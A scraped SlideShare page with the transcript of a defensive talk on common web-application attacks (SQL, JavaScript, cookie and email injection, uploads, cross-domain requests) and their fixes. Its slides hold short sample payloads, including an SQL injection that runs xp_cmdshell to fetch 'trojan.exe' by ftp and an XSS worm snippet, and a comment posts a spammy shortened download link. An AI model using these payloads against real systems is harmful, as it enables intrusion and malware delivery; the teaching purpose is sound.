• Save
How To Hack
Upcoming SlideShare
Loading in...5
×
 

How To Hack

on

  • 5,194 views

Or how not to get hacked! The common ways that web applications can be attacked and what you need to do to prevent it.

Or how not to get hacked! The common ways that web applications can be attacked and what you need to do to prevent it.

Statistics

Views

Total Views
5,194
Views on SlideShare
5,029
Embed Views
165

Actions

Likes
11
Downloads
0
Comments
2

5 Embeds 165

http://www.ts0.com 116
http://infoseclab.blogspot.com 21
http://ts0.com 12
http://barcampbrighton.backnetwork.com 12
http://www.slideshare.net 4

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • This is a old version. download free latest version from here. this is better for this: http://bit.ly/12rUOWq

    no survay no password
    Are you sure you want to
    Your message goes here
    Processing…
  • my slide i like
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

How To Hack How To Hack Presentation Transcript

  • Thom Shannon – Glow New Media
  • 7 SINS OF A COMPLACENT WEB DEVELOPER
    • SQL Injection
    • JavaScript Injection
    • Cookie Injection
    • Email Injection
    • File Uploads
    • Cross domain form submission
    • Cross domain JSON APIs
  •  
    • SELECT * FROM [User] WHERE
    • [Name] = ‘ admin ’
    • AND
    • [Password] = ‘ secret ’
    • SELECT * FROM [User] WHERE
    • [Name] = ‘ admin ’
    • AND
    • [Password] = ‘ ’ or true; -- ’
  •  
    • SELECT * FROM [Page] WHERE
    • [Title] = ‘ Home’; exec xp_cmdshell(‘ftp host trojan.exe’)’ -- ’
    • Validate ALL possible inputs
    • Escape Quotes!
    • Use strongly typed/parameter queries
    • Can affect many platforms
      • ASP
      • .Net
      • PHP
      • ...
  •  
  • MYSPACE WORM
    • <div id=&quot;mycode&quot; expr=&quot;alert(‘pwnd!’)&quot; style=&quot;background:url('java script:eval(document.all.mycode.expr)')&quot;>
  •  
  •  
  • DEFAULT DENY
    • Strip all HTML
    • Use a simple markup like Textile
    • Validate ALL inputs
  •  
  • BAD COOKIES
    • loggedon=false
    • Userid=78
    • permissionlevel=1
    • Store important data on server
    • Use a token
    • Do not trust anything sent from the client
  •  
    • Used by Spammers
    • From: [email_address]
    • Cc:spamee@gmail.com, poorsap@hotmail.com
    • Subject: Buy [Drugs|Viagra|Stocks]
    • Validate email addresses and other content
    • Don’t put user input in mail headers
  •  
    • /uploads/runSpamEngine.php
    • /uploads/downloadDb.aspx
    • /uploads/crashBox.exe
    • SysAdmin can remove execution permissions
    • Web Developer can validate too
    • Always use DEFAULT DENY (whitelist)
  •  
    • Post from attackers site to logged in site
    • Action purchases
    • Change profile page
    • Use hidden frame to keep posting
  •  
    • Pass a token with the form
    • Confirm destructive actions
    • 307 redirect in Internet Explorer
  •  
    • AJAX friendly APIs
    • JavaScript blog widgets
    • Called using SCRIPT elements
    • Can cause actions or reveal private data
    • Client side code is always insecure
    • Authenticate with query string
    • Track using API application key
  • In Summary
    • Don’t pass the buck, take responsibility
    • Web app exploits are the most common
    • Everyone is a target
    • Thom Shannon
    • www.ts 0 .com